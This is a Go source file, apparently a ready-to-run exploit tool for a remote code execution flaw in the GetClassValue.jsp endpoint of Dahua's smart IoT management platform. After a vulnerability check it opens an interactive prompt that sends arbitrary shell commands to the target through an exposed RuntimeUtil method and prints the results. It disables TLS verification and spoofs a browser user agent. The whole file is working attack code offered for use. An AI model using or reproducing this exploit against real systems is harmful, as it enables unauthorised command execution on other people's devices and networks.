package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"net/http"
	"net/url"
	"os"
	"strings"

	"github.com/fatih/color"
	"github.com/imroc/req/v3"
	"github.com/tidwall/gjson"
)

func main() {
	fmt.Println(color.RedString("大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞"))
	for {
		fmt.Print("Input Target : ")
		buffer := bufio.NewScanner(os.Stdin)
		for buffer.Scan() {
			if buffer.Text() != "q" && buffer.Text() != "quit" && buffer.Text() != "exit" {
				if !testURL(buffer.Text()) {
					fmt.Println("This Site Not Vulnerbale Main Exit")
					return
				}
				exploit(buffer.Text())
				return
			} else {
				fmt.Println("User Sending Exit Signal")
				return
			}
		}
	}
}

func cli() *req.Client {
	c := req.C()
	c.EnableInsecureSkipVerify()
	return c
}

func testURL(t string) bool {
	target, err := url.Parse(t)
	if err != nil {
		return false
	}
	if target.Scheme != "http" {
		if target.Scheme != "https" {
			fmt.Printf("UnSupport Schema %s\n", target.Scheme)
			return false
		}
		c := cli()
		targetURL := strings.Replace(t+"/evo-apigw/admin/API/Developer/GetClassValue.jsp", "//evo-apigw", "/evo-apigw", 1)
		resp, err := c.R().Get(targetURL)
		if err != nil {
			return false
		}
		if resp.StatusCode == http.StatusOK {
			if !gjson.Get(resp.String(), "success").Bool() {
				return false
			} else {
				return true
			}

		}
	}
	return false
}

type Request struct {
	Data Data `json:"data"`
}

type Data struct {
	ClazzName  string   `json:"clazzName"`
	MethodName string   `json:"methodName"`
	FieldName  []string `json:"fieldName"`
}

func exploit(t string) {
	for {

		fmt.Print("Input Your CMD : ")
		buffer := bufio.NewScanner(os.Stdin)
		for buffer.Scan() {
			if buffer.Text() == "" || buffer.Text() == "exit" || buffer.Text() == "quit" || buffer.Text() == "q" {
				return
			}
			targetURL := strings.Replace(t+"/evo-apigw/admin/API/Developer/GetClassValue.jsp", "//evo-apigw", "/evo-apigw", 1)
			c := cli()
			c.SetAutoDecodeAllContentType()
			c.SetCommonContentType("application/json")
			c.SetUserAgent("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36")
			request := Request{
				Data: Data{
					ClazzName:  "com.dahua.admin.util.RuntimeUtil",
					MethodName: "syncexecReturnInputStream",
					FieldName:  []string{buffer.Text()},
				},
			}
			jsonData, _ := json.MarshalIndent(request, "", "    ")

			resp, err := c.R().SetBody(string(jsonData)).Post(targetURL)
			if err != nil {
				return
			}
			result := gjson.Get(resp.String(), "errMsg").String()
			if result == "" {
				result = gjson.Get(resp.String(), "data").String()
				fmt.Println(result)
				break
			} else {
				fmt.Println("This Site Not Vulnerbale")
				return
			}
		}
	}
}
